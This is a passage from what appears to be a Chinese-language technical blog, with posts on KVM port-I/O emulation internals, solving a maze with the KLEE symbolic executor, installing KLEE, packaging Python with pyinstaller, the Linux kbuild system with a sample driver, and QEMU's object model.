    } else {
        memcpy(dest, rc->data + rc->pos, size);
        rc->pos += size;
    }
    return 1;
}

static int emulator_pio_in_emulated(struct x86_emulate_ctxt *ctxt,
                    int size, unsigned short port, void *val,
                    unsigned int count)
{
    struct kvm_vcpu *vcpu = emul_to_vcpu(ctxt);
    int ret;

    if (vcpu->arch.pio.count)
        goto data_avail;

    ret = emulator_pio_in_out(vcpu, size, port, val, count, true);
    if (ret) {
data_avail:
        memcpy(val, vcpu->arch.pio_data, size * count);
        vcpu->arch.pio.count = 0;
        return 1;
    }

    return 0;
}

在最后一个函数中，由于vcpu->arch.pio.count此时还没有数据（需要user spaces提供），所以会执行 emulator_pio_in_out，这在之前已经看过这个函数了，这就是设置kvm_run的相关数据，然后user spaces来填充。

执行完了x86_emulate_insn，流程再次回到x86_emulate_instruction，最重要的是设置 vcpu->arch.complete_userspace_io这样一个回调。

if (ctxt->have_exception) {
    inject_emulated_exception(vcpu);
    r = EMULATE_DONE;
} else if (vcpu->arch.pio.count) {
    if (!vcpu->arch.pio.in)
        vcpu->arch.pio.count = 0;
    else {
        writeback = false;
        vcpu->arch.complete_userspace_io = complete_emulated_pio;
    }

之后这一次vm exit就算完事了。这样就会退到user space的ioctl KVM_RUN处。user space发现是一个 KVM_EXIT_IO，并且方向是KVM_EXIT_IO_IN，于是向kvm_run填入数据0xbeff。

case KVM_EXIT_IO:
    printf("KVM_EXIT_IO\n");
    if(kvm->vcpus->kvm_run->io.direction == KVM_EXIT_IO_OUT)
        printf("out port: %d, data: 0x%x\n", 
            kvm->vcpus->kvm_run->io.port,  
            *(int *)((char *)(kvm->vcpus->kvm_run) + kvm->vcpus->kvm_run->io.data_offset)
            );
    else if(kvm->vcpus->kvm_run->io.direction == KVM_EXIT_IO_IN)
    {
        printf("in port: %d\n",kvm->vcpus->kvm_run->io.port);
        *(short*)((char*)(kvm->vcpus->kvm_run)+kvm->vcpus->kvm_run->io.data_offset) = 0xbeff;
    }

由于user space的ioctl一般都是运行在一个循环中（如果不这样，guest也就不可能一直运行着了)。所以接着调用 KVM_RUN ioctl。在进入non-root的模式前，有一个工作就是判断vcpu->arch.complete_userspace_io 是否设置，如果设置就会调用。

int kvm_arch_vcpu_ioctl_run(struct kvm_vcpu *vcpu, struct kvm_run *kvm_run)
{
    int r;
    sigset_t sigsaved;

    if (unlikely(vcpu->arch.complete_userspace_io)) {
        int (*cui)(struct kvm_vcpu *) = vcpu->arch.complete_userspace_io;
        vcpu->arch.complete_userspace_io = NULL;
        r = cui(vcpu);
        if (r <= 0)
            goto out;
    } else
        WARN_ON(vcpu->arch.pio.count || vcpu->mmio_needed);

    r = __vcpu_run(vcpu);


    return r;
}

从之前的分之知道

vcpu->arch.complete_userspace_io = complete_emulated_pio;

看看相应的代码

static int complete_emulated_pio(struct kvm_vcpu *vcpu)
{
    BUG_ON(!vcpu->arch.pio.count);

    return complete_emulated_io(vcpu);
}

static inline int complete_emulated_io(struct kvm_vcpu *vcpu)
{
    int r;
    vcpu->srcu_idx = srcu_read_lock(&vcpu->kvm->srcu);
    r = emulate_instruction(vcpu, EMULTYPE_NO_DECODE);
    srcu_read_unlock(&vcpu->kvm->srcu, vcpu->srcu_idx);
    if (r != EMULATE_DONE)
        return 0;
    return 1;
}

static inline int emulate_instruction(struct kvm_vcpu *vcpu,
        int emulation_type)
{
    return x86_emulate_instruction(vcpu, 0, emulation_type, NULL, 0);
}

最终也是调用了x86_emulate_instruction，值得注意的是用了参数EMULTYPE_NO_DECODE，这就不会再次解码。而是直接执行我们之前的em_in函数。

static int emulator_pio_in_emulated(struct x86_emulate_ctxt *ctxt,
                    int size, unsigned short port, void *val,
                    unsigned int count)
{
    struct kvm_vcpu *vcpu = emul_to_vcpu(ctxt);
    int ret;

    if (vcpu->arch.pio.count)
        goto data_avail;

    ret = emulator_pio_in_out(vcpu, size, port, val, count, true);
    if (ret) {
data_avail:
        memcpy(val, vcpu->arch.pio_data, size * count);
        vcpu->arch.pio.count = 0;
        return 1;
    }

    return 0;
}

在最终的emulator_pio_in_emulated中，由于这个时候vcpu->arch.pio.count已经有值了，表示数据可用了。最终会把数据拷贝到ctx->dst.val中。

(gdb) n
em_in (ctxt=0xffff88011d429550) at arch/x86/kvm/emulate.c:3440
3440        return X86EMUL_CONTINUE;
(gdb) n
3441    }
(gdb) p ctxt->dst.val
$58 = 48895
(gdb) p /x ctxt->dst.val
$59 = 0xbeff
(gdb) n

回到x86_emulate_insn，执行完了指令回调之后，会调到writeback函数去：

if (ctxt->execute) {
    if (ctxt->d & Fastop) {
        void (*fop)(struct fastop *) = (void *)ctxt->execute;
        rc = fastop(ctxt, fop);
        if (rc != X86EMUL_CONTINUE)
            goto done;
        goto writeback;
    }

writeback:
    rc = writeback(ctxt);
    if (rc != X86EMUL_CONTINUE)
        goto done;

我们之前解码得到ctxt->dst.type是一个寄存器，所以会执行write_register_operand

static int writeback(struct x86_emulate_ctxt *ctxt)
{
    int rc;

    if (ctxt->d & NoWrite)
        return X86EMUL_CONTINUE;

    switch (ctxt->dst.type) {
    case OP_REG:
        write_register_operand(&ctxt->dst);
        break;
    

    return X86EMUL_CONTINUE;
}

static void write_register_operand(struct operand *op)
{
    /* The 4-byte case *is* correct: in 64-bit mode we zero-extend. */
    switch (op->bytes) {
    case 1:
        *(u8 *)op->addr.reg = (u8)op->val;
        break;
    case 2:
        *(u16 *)op->addr.reg = (u16)op->val;
        break;
    case 4:
        *op->addr.reg = (u32)op->val;
        break;  /* 64b: zero-extend */
    case 8:
        *op->addr.reg = op->val;
        break;
    }
}

最后一个函数op->addr.reg是解码过程中的目的操作数的寄存器，由之前知道是rax(&ctxt->_regs[0])，这样就把数据(0xbeff)写到了寄存器了。但是这里是ctxt的寄存器，最后还需要写到vmcs中去，通过调用如下函数实现

if (rc == X86EMUL_CONTINUE)
    writeback_registers(ctxt);

static void writeback_registers(struct x86_emulate_ctxt *ctxt)
{
    unsigned reg;

    for_each_set_bit(reg, (ulong *)&ctxt->regs_dirty, 16)
        ctxt->ops->write_gpr(ctxt, reg, ctxt->_regs[reg]);
}

static void emulator_write_gpr(struct x86_emulate_ctxt *ctxt, unsigned reg, ulong val)
{
    kvm_register_write(emul_to_vcpu(ctxt), reg, val);
}

static inline void kvm_register_write(struct kvm_vcpu *vcpu,
                    enum kvm_reg reg,
                    unsigned long val)
{
    vcpu->arch.regs[reg] = val;
    __set_bit(reg, (unsigned long *)&vcpu->arch.regs_dirty);
    __set_bit(reg, (unsigned long *)&vcpu->arch.regs_avail);
}

这样，接着进入guest状态的时候,guest得RAX就有了user space传来的数据了。下面是一些调试数据。

(gdb) n
x86_emulate_insn (ctxt=0xffff88011d429550) at arch/x86/kvm/emulate.c:4828
4828        ctxt->dst.type = saved_dst_type;
(gdb) p ctxt->dst.val
$64 = 48895
(gdb) p &ctxt->dst.val
$65 = (unsigned long *) 0xffff88011d429640
(gdb) p &op->val
No symbol "op" in current context.
(gdb) n
4830        if ((ctxt->d & SrcMask) == SrcSI)
(gdb) p ctxt->dst.type
$66 = OP_REG
(gdb) n
[New Thread 2976]
4833        if ((ctxt->d & DstMask) == DstDI)
(gdb) n
[New Thread 2978]
[New Thread 2977]
4836        if (ctxt->rep_prefix && (ctxt->d & String)) {
(gdb) n
4866        ctxt->eip = ctxt->_eip;
(gdb) n
4875            writeback_registers(ctxt);

四. 参考

oenhan: KVM源代码分析5:IO虚拟化之PIO

Alex Xu: 使用KVM API实现Emulator Demo

KLEE解决迷宫问题

2017-06-09T00:00:00+00:00

这是KLEE的第三篇tutorial，感觉还是挺有意思的，虽然简单还是记录一下，原文在此。

问题描述

问题也比较简单，给出一个路径，在下面的迷宫中从’X’走到’#’，a表示左，d表示右，w表示上，s表示下。

"+-+---+---+"
"|X|     |#|"
"| | --+ | |"
"| |   | | |"
"| +-- | | |"
"|     |   |"
"+-----+---+" 

传统方法

// http://feliam.wordpress.com/2010/10/07/the-symbolic-maze/ ‎
// twitter.com/feliam
/*
* It's a maze!
* Use a,s,d,w to move "through" it.
*/

#include<string.h>
#include<stdio.h>
#include<stdlib.h>


/**
* Maze hardcoded dimensions
*/
#define H 7
#define W 11
/**
* Tha maze map
*/
char maze[H][W] = { "+-+---+---+",
					"| |     |#|",
					"| | --+ | |",
					"| |   | | |",
					"| +-- | | |",
					"|     |   |",
					"+-----+---+" };

/**
* Draw the maze state in the screen!
*/
void draw ()
{
		int i, j;
		for (i = 0; i < H; i++)
		{
				for (j = 0; j < W; j++)
								printf ("%c", maze[i][j]);
				printf ("\n");
		}
		printf ("\n");
}


/**
* The main function
*/
int
main (int argc, char *argv[])
{
		int x, y;     //Player position
		int ox, oy;   //Old player position
		int i = 0;    //Iteration number
	#define ITERS 28
	char program[ITERS];

//Initial position
		x = 1;
		y = 1;
	maze[y][x]='X';

//Print some info
	printf ("Maze dimensions: %dx%d\n", W, H);
	printf ("Player pos: %dx%d\n", x, y);
	printf ("Iteration no. %d\n",i);
	printf ("Program the player moves with a sequence of 'w', 's', 'a' and 'd'\n");
	printf ("Try to reach the price(#)!\n");

//Draw the maze
	draw ();    
//Read the directions 'program' to execute...
	read(0,program,ITERS);

//Iterate and run 'program'
		while(i < ITERS)
		{
		//Save old player position
				ox = x;
				oy = y;
		//Move polayer position depending on the actual command
				switch (program[i])
					{
					case 'w':
							y--;
							break;
					case 's':
							y++;
							break;
					case 'a':
							x--;
							break;
					case 'd':
							x++;
							break;
					default:
						printf("Wrong command!(only w,s,a,d accepted!)\n");
						printf("You loose!\n");
						exit(-1);
					}

		//If hit the price, You Win!!            
				if (maze[y][x] == '#')
					{
							printf ("You win!\n");
							printf ("Your solution <%42s>\n",program);
							exit (1);
					}
		//If something is wrong do not advance
				if (maze[y][x] != ' '
					&&
					!((y == 2 && maze[y][x] == '|' && x > 0 && x < W)))
					{
							x = ox;
							y = oy;
					}
		
		//Print new maze state and info...
		printf ("Player pos: %dx%d\n", x, y);
		printf ("Iteration no. %d. Action: %c. %s\n",i,program[i], ((ox==x && oy==y)?"Blocked!":""));
		
		//If crashed to a wall! Exit, you loose
		if (ox==x && oy==y){
					printf("You loose\n");
				exit(-2);
		}
		//put the player on the maze...
		maze[y][x]='X';
		//draw it
				draw ();
		//increment iteration
				i++;
				//me wait to human
				sleep(1);
		}
//You couldn't make it! You loose!       
printf("You loose\n");
}

程序是很简单的，就是给一串输入，然后依次判断，最终给出win或者loose的输出。可以通过观察看到一个解ssssddddwwaawwddddssssddwwww，当然也可以用回溯算法让程序找解。这里我们主要看看用KLEE如何找解。

KLEE求解

KLEE的作用主要是将输入符号化，所以，首先首先将read调用改成klee_make_symbolic，这样就符号化了program变量，当然需要包含头文件#include <klee\/klee.h>。

//read(0,program,ITERS);
klee_make_symbolic(program,ITERS,"program");

这样之后KLEE就会找出所有的路径，但是这样是不够的，因为我们只对win的路径感兴趣，所以需要由一个flag来表示。我们可以在

printf ("You win!\n");

这个语句之后增加一个

klee_assert(0);

这样只要找到一个成功的路径，就会触发一个assert。开始执行。

$ clang -I ../klee/include -emit-llvm -c maze.c
$ klee maze.bc 
...
KLEE: done: total instructions = 127519
KLEE: done: completed paths = 309
KLEE: done: generated tests = 306
test@ubuntu:~/kleestudy$ ls klee-last/*.err
klee-last/test000135.assert.err
test@ubuntu:~/kleestudy$ ktest-tool klee-last/test000135.ktest
ktest file : 'klee-last/test000135.ktest'
args       : ['maze.bc']
num objects: 1
object    0: name: 'program'
object    0: size: 28
object    0: data: 'sddwddddsddwssssssssssssssss'

我们看到输出一个解，

sddwddddsddwssssssssssssssss

直接用这个待入之前的第二节的程序，可以看到是正确的。这里我们注意到KLEE这里输出的解跟我们肉眼的解是不一样的。确实是这样，大多数情况下，KLEE只会输出一个错误状态的路径。要输出所有这个路径的所有输入，需要使用-emit-all-errors：

$ klee -emit-all-errors maze.bc
test@ubuntu:~/kleestudy$ ls klee-last/*.err
klee-last/test000139.assert.err  klee-last/test000238.assert.err
klee-last/test000220.assert.err  klee-last/test000301.assert.err

我们看到输出了四个解。其实从运行的时候可以看出，y==2的时候穿墙了，代码里面也看得出来。

Ubuntu 16.04安装KLEE

2017-06-08T00:00:00+00:00

符号执行也算是阳春白雪了，不研究一下都不好意思说你是搞安全的。据说这也是大坑，到哪是哪。本文主要记录Ubuntu 16.04下面安装KLEE的过程，使用的clang/llvm是3.9的。整体还是按照官网来的，一些容易出错的地方记录一下。

1. 安装依赖库

$ sudo apt-get install build-essential curl libcap-dev git cmake libncurses5-dev python-minimal python-pip unzip

2. 安装LLVM 3.9

这一步直接用安装packages就行，LLVM Package Repository选 llvm3.9添加到/etc/apt/sources.list

deb http://apt.llvm.org/xenial/ llvm-toolchain-xenial-3.9 main
deb-src http://apt.llvm.org/xenial/ llvm-toolchain-xenial-3.9 main

添加repository key并下载llvm 3.9的packages

$ wget -O - http://llvm.org/apt/llvm-snapshot.gpg.key|sudo apt-key add -  
$ sudo apt-get update  
$ sudo apt-get install clang-3.9 llvm-3.9 llvm-3.9-dev llvm-3.9-tools 

注意这个时候/usr/bin/clang-3.9是在PATH里面，为了使用clang以及其他不带3.9后缀的版本，需要在~/.profile里面改一下PATH：

export PATH="/usr/lib/llvm-3.9/bin:$PATH"

3. 安装constraint solver

KLEE支持几种约束求解器，这里我用的是Z3，这个按照官网编译就好。

4. 编译uclibc and the POSIX environment model

$ git clone https://github.com/klee/klee-uclibc.git  
$ cd klee-uclibc  
$ ./configure --make-llvm-lib  
$ make -j2  

5. Get Google test sources

$ curl -OL https://github.com/google/googletest/archive/release-1.7.0.zip
$ unzip release-1.7.0.zip

6. Install lit

用sudo安装

$ sudo pip install lit

7. Install tcmalloc

$ sudo apt-get install libtcmalloc-minimal4 libgoogle-perftools-dev

8. 得到KLEE源码

由于我们用的是llvm 3.9，直接用官方的KLEE会出现下列问题：

/home/test/klee/include/klee/Internal/Support/FloatEvaluation.h: In function ‘bool klee::floats::isNaN(uint64_t, unsigned int)’:
/home/test/klee/include/klee/Internal/Support/FloatEvaluation.h:135:25: error: ‘IsNAN’ is not a member of ‘llvm’
case FLT_BITS: return llvm::IsNAN( UInt64AsFloat(l) );
						^
/home/test/klee/include/klee/Internal/Support/FloatEvaluation.h:136:25: error: ‘IsNAN’ is not a member of ‘llvm’
case DBL_BITS: return llvm::IsNAN( UInt64AsDouble(l) );
						^
/home/test/klee/lib/Core/Executor.cpp: In member function ‘void klee::Executor::executeCall(klee::ExecutionState&, klee::KInstruction*, llvm::Function*, std::vector<klee::ref<klee::Expr> >&)’:
/home/test/klee/lib/Core/Executor.cpp:1403:21: error: ‘RoundUpToAlignment’ is not a member of ‘llvm’
			size = llvm::RoundUpToAlignment(size, 16);

好在有人提供了一个llvm 3.9的pr 我们直接clone这个人的repo。

test@ubuntu:~$ git clone https://github.com/jirislaby/klee.git
test@ubuntu:~$ cd klee
test@ubuntu:~/klee$ git branch -a
* master
remotes/origin/HEAD -> origin/master
remotes/origin/better-paths
remotes/origin/errno
remotes/origin/llvm40_WallTimer
remotes/origin/llvm40_opt_end
remotes/origin/llvm40_static_casts
remotes/origin/llvm_37
remotes/origin/llvm_39
remotes/origin/master
test@ubuntu:~/klee$ git checkout remotes/origin/llvm_39

9. 配置KLEE

$ mkdir klee_build_dir
$ cd klee_build_dir
$ cmake -DENABLE_SOLVER_Z3=ON \
	-DENABLE_POSIX_RUNTIME=ON  \
	-DENABLE_KLEE_UCLIBC=ON \
	-DKLEE_UCLIBC_PATH=../klee-uclibc \
	-DGTEST_SRC_DIR=../googletest-release-1.7.0  \
	-DENABLE_SYSTEM_TESTS=ON  \
	-DENABLE_UNIT_TESTS=ON \
	../klee

如果这一步出现找不到Doxygen，需要安装

$ sudo apt-get install doxygen

如果出现ZLIB_LIBRARY (ADVANCED)，需要自己下载zlib安装。

10. 编译安装KLEE

$ make
$ sudo make install

这一步出现了一个错误：

make[2]: *** No rule to make target '/usr/lib/llvm-3.9/lib/liblibLLVM-3.9.so.so', needed by 'bin/gen-random-bout'.  Stop.

找不到这个so,一看名字liblibLLVM-3.9.so.so，太怪异了，目测是脚本的问题。

test@ubuntu:~/klee_build_dir$ cd /usr/lib/llvm-3.9/lib
test@ubuntu:/usr/lib/llvm-3.9/lib$ ls

libLLVM-3.9.1.so                                       libLLVMX86AsmParser.a
libLLVM-3.9.1.so.1                                     libLLVMX86AsmPrinter.a
libLLVM-3.9.so                                         libLLVMX86CodeGen.a
libLLVM-3.9.so.1                                       libLLVMX86Desc.a

简单的解决办法：

$ ln -l libLLVM-3.9.so liblibLLVM-3.9.so.so

这样就把KLEE的环境搞好了，可以安装Tutorial搞起来了。

Python打包成exe

2017-05-18T00:00:00+00:00

这篇文章非常简单，主要做一下记录，以后方便查询。

Python简单易用经常被用来开发脚本。但是为了在其他地方运行，可能不仅需要安装Python解释器，还得安装一些依赖库。这篇文章介绍一下使用pyinstaller打包exe的过程。使用如下例子：

#test.py
import sys

def main():
	print "Hello world"
	print sys.argv[0]
if '__main__' == __name__:
	main()

首先安装pyinstaller:

pip install pyinstaller

按照官网的说法，这个时候在Python的目录下使用

pyinstaller test.py

就能够生产exe，虽然确实是在dist/test目录下面生成了exe，但是如果放到其他地方，会有错误：

Error loading Python DLL: E:\study\python27.dll (error code 126)

可以使用如下命令解决：

D:\Python27>pyinstaller --clean --win-private-assemblies -F test.py

这样在dist会生产exe，并且把需要的Python和相关的包全部打包，即可随意放到一个环境运行。

Linux内核编译系统kbuild简介

2017-03-29T00:00:00+00:00

前言
kbuild四个部分
实例

前言

这篇文章并非原创，是偶然在linuxjournal上面看到的一篇文章，感觉写得比较清晰，例子详尽，所以这里对文章进行简单整理，算是一个笔记。本文主要是关于kbuild的简单介绍，不会介绍linux内核的具体编译过程，以后机会单独写一篇。

Linux内核有一个神奇的地方，既可以用在大型集群上面，也可以用在小巧的嵌入式设备上。使用Linux的设备不论大小，都有一个共同的代码基，你看苹果就不行，OSX和iOS就是分开的。主要原因有两点，Linux有一个非常好的抽象层，以及构建系统允许有非常大的定制自由度。

Linux是一个mono类型的内核，所有的内核代码都位于内核空间。但是Linux也能够加载内核模块，在内核运行期间可以增加内核代码。所以在内核编译的时候就需要决定哪些东西需要编译进内核，哪些需要编译成模块。这就需要一个系统来管理了，这就是kbuild。

kbuild的四个部分

kbuild主要包括如下四个部分：

Config symbols:编译选项，用来决定代码的条件编译以及决定哪些编译进内核，哪些编译成模块。
Kconfig files:定义每一个config symbol的属性，比如其类型，描述和依赖等。程序需要使用Kconfig file生成一个菜单，比如make menuconfig生成的数据就是读取这个文件来生成的。
.config file:存储每一个config symbol选择的值。可以手动修改或者使用make工具生成。
Makefiles:这个就是普通的make工具了，用于指导源文件生成目标文件的过程，内核啊，内核模块啊。

下面对这四个部分进行详细介绍。

Configuration Symbols

Configuration Symbols用来决定哪些特性或者模块将会被编译进内核。最常见的是两种编译选项，boolean和tristate，其不同之处只是可以取的值不同。boolean symbols可以取两种值:true/false，就是开关。tristate可以取三种值，yes/no/module。

内核中的很多选项都需要一个开关，而不是module，比如对SMP或者preemption的支持，必须要在内核编译时候就决定好，这个时候就用boolean config symbol就行了。很多设备驱动可以在之后加入内核，这个时候使用tristate config symbol，决定是编译进内核呢，还是模块，还是压根就不编译。

其他config symbol包括strings和hex，但是这些不常用，此处从略。

Kconfig Files

Configuration symbols是定义在Kconfig file中的，每一个Kconfig file可以描述任意数量的symbols，也可以使用include包含其他Kconfig file。内核编译工具如，make menuconfig读取这些文件生成一个树形结构。内核中的每一个目录都有一个Kconfig，并且它们包含自己子目录的Kconfig file，内核根目录树下面有一个Kconfig。menuconfig/gconfig就从根目录下的Kconfig开始，递归读取。

下面是arc/x86下的Kconfig节选：

# Select 32 or 64 bit
config 64BIT
	bool "64-bit kernel" if ARCH = "x86"
	default ARCH != "i386"
	---help---
	  Say yes to build a 64-bit kernel - formerly known as x86_64
	  Say no to build a 32-bit kernel - formerly known as i386

config X86_32
	def_bool y
	depends on !64BIT
	# Options that are inherently 32-bit kernel only:
	select ARCH_WANT_IPC_PARSE_VERSION
	select CLKSRC_I8253
	select CLONE_BACKWARDS
	select HAVE_AOUT
	select HAVE_GENERIC_DMA_COHERENT
	select MODULES_USE_ELF_REL
	select OLD_SIGACTION

.config file

所有的config symbol值都保存在.config文件中，每一次执行meuconfig都会讲变化写入该文件。.config是一个文本文件，所以可以直接手动修改。.config每一行都会表示一个config symbol的值，如果没有选就会注释掉。

CONFIG_KVM_AMD=m
# CONFIG_KVM_MMU_AUDIT is not set
CONFIG_KVM_DEVICE_ASSIGNMENT=y
CONFIG_VHOST_NET=m

Makefiles

Makefiles用来编译内核和模块，与Kconfig类似，每一个子目录都会有一个Makefile文件，用来编译其下的文件。整个编译过程也是递归的，上一层的Makefile下降到子目录中，然后编译。

实例

本节中实现一个coin driver，把上面的东西实践一下。coin driver是一个char类型的driver，每次读随机返回正反面(tail/head)，并且有一个统计次数的可选项。

比如：

test@ubuntu:~$ sudo cat /dev/coin
tail
test@ubuntu:~$ sudo cat /dev/coin
head
test@ubuntu:~$ sudo cat /dev/coin
head
test@ubuntu:~$ sudo cat /dev/coin
head
test@ubuntu:~$ sudo cat /dev/coin
head
test@ubuntu:~$ sudo cat /sys/kernel/debug/coin/stats
head=14 tail=12
test@ubuntu:~$ 

给内核增加一个模块，需要做三件事：

把源文件放在相应的目录，比如对于wifi设备驱动就应该放在drivers/net/wireless
更新文件所在目录的Kconfig
更新文件所在的Makefile

在我们的例子中，coin是一个字符设备，所以coin.c可以放在drivers/char。

coin可以编译到内核中，也可以编译成模块，所以COIN这个config symbol应该是一个tristate(y/n/m)，COIN_STAT这个config symbol用于决定是否显示统计信息，很明显，COIN_STAT依赖于COIN，如果不定义COIN，定义COIN_STAT并没有意义。

$make menuconfig

我们选择将COIN为m，COIN_STAT为y。之后在.config之中，会加上一个CONFIG_前缀。

CONFIG_COIN=m
CONFIG_COIN_STAT=y


#define CONFIG_COIN_MODULE 1
#define CONFIG_COIN_STAT 1

当编译的时候，会执行脚本读取Kconfig

$ scripts/kconfig/conf Kconfig

生成一个头文件include/generated/autoconf.h，其中可以看到

#define CONFIG_COIN_MODULE 1
#define CONFIG_COIN_STAT 1

如果将COIN定义为y，则会有如下定义

#define CONFIG_COIN 1

为了生成.ko，我们还需要再drivers/char/Makefile中添加如下：

obj-$(CONFIG_COIN)    += coin.o

由于CONFIG_COIN不是y就是m，所以coin.o会被添加到obj-y或者obj-m链表中。这样例子就完成了。kbuild编译流程可以简单如下图所示。文末附上驱动代码，来自原文。

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/fs.h>
#include <linux/uaccess.h>
#include <linux/device.h>
#include <linux/random.h>
#include <linux/debugfs.h>

#define DEVNAME "coin"
#define LEN  20
enum values {HEAD, TAIL};

struct dentry *dir, *file;
int file_value;
int stats[2] = {0, 0};
char *msg[2] = {"head\n", "tail\n"};

static int major;
static struct class *class_coin;
static struct device *dev_coin;

static ssize_t r_coin(struct file *f, char __user *b,
					size_t cnt, loff_t *lf)
{
		char *ret;
		u32 value = prandom_u32() % 2;
		ret = msg[value];
		stats[value]++;
		return simple_read_from_buffer(b, cnt,
									lf, ret,
									strlen(ret));
}

static struct file_operations fops = { .read = r_coin };

#ifdef CONFIG_COIN_STAT
static ssize_t r_stat(struct file *f, char __user *b,
						size_t cnt, loff_t *lf)
{
		char buf[LEN];
		snprintf(buf, LEN, "head=%d tail=%d\n",
				stats[HEAD], stats[TAIL]);
		return simple_read_from_buffer(b, cnt,
									lf, buf,
									strlen(buf));
}

static struct file_operations fstat = { .read = r_stat };
#endif

int init_module(void)
{
		void *ptr_err;
		major = register_chrdev(0, DEVNAME, &fops);
		if (major < 0)
				return major;

		class_coin = class_create(THIS_MODULE,
								DEVNAME);
		if (IS_ERR(class_coin)) {
				ptr_err = class_coin;
				goto err_class;
		}

		dev_coin = device_create(class_coin, NULL,
								MKDEV(major, 0),
								NULL, DEVNAME);
		if (IS_ERR(dev_coin))
				goto err_dev;

#ifdef CONFIG_COIN_STAT
		dir = debugfs_create_dir("coin", NULL);
		file = debugfs_create_file("stats", 0644,
								dir, &file_value,
								&fstat);
#endif

		return 0;
err_dev:
		ptr_err = class_coin;
		class_destroy(class_coin);
err_class:
		unregister_chrdev(major, DEVNAME);
		return PTR_ERR(ptr_err);
}

void cleanup_module(void)
{
#ifdef CONFIG_COIN_STAT
		debugfs_remove(file);
		debugfs_remove(dir);
#endif

		device_destroy(class_coin, MKDEV(major, 0));
		class_destroy(class_coin);
		return unregister_chrdev(major, DEVNAME);
}

MODULE_LICENSE("GPL");

QOM介绍

2017-01-08T00:00:00+00:00

一. 模块注册
二. Class的初始化
三. Class的层次结构
四. 对象的构造
五. 总结
后记

QOM全称qemu object model,顾名思义，这是对qemu中对象的一个抽象层。通过QOM可以对qemu中的各种资源进行抽象、管理。比如设备模拟中的设备创建，配置，销毁。QOM还用于各种backend的抽象，MemoryRegion，Machine等的抽象，毫不夸张的说，QOM遍布于qemu代码。本文以qemu的设备模拟为例，对QOM进行详细介绍。本文代码基于qemu-2.8。

一. 模块注册

在hw文件目录下的设备模拟中，几乎所有.c文件都会有一个全局的

type_init(xxxxxxxxx)

。这就是向QOM模块注册自己，比如

type_init(serial_register_types)//注册serial
type_init(vmxnet3_register_types)//注册vmxnet3

这类似于Linux驱动模块的注册，在这里type_init是一个宏，在include/qemu/module.h中，我们看到

#define module_init(function, type)                                         \
static void __attribute__((constructor)) do_qemu_init_ ## function(void)    \
{                                                                           \
    register_module_init(function, type);                                   \
}
typedef enum {
    MODULE_INIT_BLOCK,
    MODULE_INIT_OPTS,
    MODULE_INIT_QAPI,
    MODULE_INIT_QOM,
    MODULE_INIT_TRACE,
    MODULE_INIT_MAX
} module_init_type;

#define block_init(function) module_init(function, MODULE_INIT_BLOCK)
#define opts_init(function) module_init(function, MODULE_INIT_OPTS)
#define qapi_init(function) module_init(function, MODULE_INIT_QAPI)
#define type_init(function) module_init(function, MODULE_INIT_QOM)
#define trace_init(function) module_init(function, MODULE_INIT_TRACE)

这里有多个module,对于xxx_init，都是通过调用module_init来进行注册的。

void register_module_init(void (*fn)(void), module_init_type type)
{
    ModuleEntry *e;
    ModuleTypeList *l;

    e = g_malloc0(sizeof(*e));
    e->init = fn;
    e->type = type;

    l = find_type(type);

    QTAILQ_INSERT_TAIL(l, e, node);
}

static ModuleTypeList *find_type(module_init_type type)
{
    init_lists();

    return &init_type_list[type];
}

static ModuleTypeList init_type_list[MODULE_INIT_MAX];

这样一看就比较清楚了，init_type_list作为全局的list数组，所有通过type_init注册的对象就会被放连接在init_type_list[MODULE_INIT_QOM]这个list上。这个过程可以用如下图表示。

我们注意到module_init的定义

#define module_init(function, type)                                         \
static void __attribute__((constructor)) do_qemu_init_ ## function(void)    \
{                                                                           \
    register_module_init(function, type);                                   \
}

所以每一个type_init都会是一个函数do_qemu_init_xxxx，比如type_init(serial_register_types)将会被展开成

staic void __attribute__((constructor)) do_qemu_init_serial_register_types()
{
	register_module_init(serial_register_types, MODULE_INIT_QOM)
}

从constructor属性看，这将会使得该函数在main之前执行。

所以在qemu的main函数执行之前，图1中的各种链表已经准备好了。在main函数中，我们可以看到，很快就调用了

module_call_init(MODULE_INIT_QOM);

看module_call_init定义，

void module_call_init(module_init_type type)
{
    ModuleTypeList *l;
    ModuleEntry *e;

    l = find_type(type);

    QTAILQ_FOREACH(e, l, node) {
        e->init();
    }
}

可以看到该函数就是简单调用了注册在其上面的init函数，以serial举例：

static void serial_register_types(void)
{
    type_register_static(&serial_isa_info);
}

type_init(serial_register_types)

这里就是调用会调用serial_register_types，这个函数以serial_isa_info为参数调用了type_register_static。函数调用链如下

type_register_static->type_register->type_register_internal->type_new

这一过程的目的就是利用TypeInfo构造出一个TypeImpl结构，之后插入到一个hash表之中，这个hash表以ti->name，也就是info->name为key,value就是生根据TypeInfo生成的TypeImpl。这样在，module_call_init(MODULE_INIT_QOM)调用之后，就有了一个type的哈希表，这里面保存了所有的类型信息。

二. Class的初始化

从第一部分我们已经知道，现在已经有了一个TypeImpl的哈希表。下一步就是初始化每个type了，这一步可以看成是class的初始化，可以理解成每一个type对应了一个class，接下来会初始化class。调用链

main->select_machine->find_default_machine->object_class_get_list->object_class_foreach

这里实在选择机器类型的时候顺便把各个type给初始化了。

void object_class_foreach(void (*fn)(ObjectClass *klass, void *opaque),
                          const char *implements_type, bool include_abstract,
                          void *opaque)
{
    OCFData data = { fn, implements_type, include_abstract, opaque };

    enumerating_types = true;
    g_hash_table_foreach(type_table_get(), object_class_foreach_tramp, &data);
    enumerating_types = false;
}

type_table_get就是之前创建的name为key,TypeImpl为value的哈希表。看看对这个表中的每一项调用的函数。

static void object_class_foreach_tramp(gpointer key, gpointer value,
                                       gpointer opaque)
{
    OCFData *data = opaque;
    TypeImpl *type = value;
    ObjectClass *k;

    type_initialize(type);
    k = type->class;

    if (!data->include_abstract && type->abstract) {
        return;
    }

    if (data->implements_type && 
        !object_class_dynamic_cast(k, data->implements_type)) {
        return;
    }

    data->fn(k, data->opaque);
}

我们来看 type_initialize函数

static void type_initialize(TypeImpl *ti)
{
    TypeImpl *parent;

    if (ti->class) {
        return;
    }

    ti->class_size = type_class_get_size(ti);
    ti->instance_size = type_object_get_size(ti);

    ti->class = g_malloc0(ti->class_size);

    parent = type_get_parent(ti);
    if (parent) {
        type_initialize(parent);
        GSList *e;
        int i;

        g_assert_cmpint(parent->class_size, <=, ti->class_size);
        memcpy(ti->class, parent->class, parent->class_size);
        ti->class->interfaces = NULL;
        ti->class->properties = g_hash_table_new_full(
            g_str_hash, g_str_equal, g_free, object_property_free);

        for (e = parent->class->interfaces; e; e = e->next) {
            InterfaceClass *iface = e->data;
